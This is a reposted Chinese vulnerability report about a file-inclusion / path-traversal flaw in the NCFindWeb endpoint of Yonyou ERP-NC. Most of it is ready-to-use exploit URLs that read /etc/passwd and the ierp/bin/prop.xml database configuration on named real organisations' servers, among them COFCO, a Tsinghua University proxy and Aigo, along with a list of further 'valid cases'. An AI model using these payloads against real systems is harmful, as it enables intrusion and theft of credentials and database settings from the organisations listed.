用友ERP-NC某处通用文件包含漏洞

没穿底裤 2020年1月1日03:44:16漏洞时代评论5,312 views993字阅读3分18秒阅读模式
摘要

可以遍历各种系统文件,影响大量知名政校企中粮集团

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd


漏洞作者: 管管侠

详细说明:

可以遍历各种系统文件,影响大量知名政校企

漏洞证明:

中粮集团

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

用友ERP-NC某处通用文件包含漏洞

还可以读取默认配置文件

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

下面有中粮几十组数据库配置,数据库群

用友ERP-NC某处通用文件包含漏洞

民生电商

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

用友ERP-NC某处通用文件包含漏洞

数据库配置

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

用友ERP-NC某处通用文件包含漏洞

清华大学

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

用友ERP-NC某处通用文件包含漏洞

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

用友ERP-NC某处通用文件包含漏洞

爱国者

http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

用友ERP-NC某处通用文件包含漏洞

以下也都是有效案例

http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

.........

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:44:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  用友ERP-NC某处通用文件包含漏洞 http://cn-sec.com/archives/76677.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: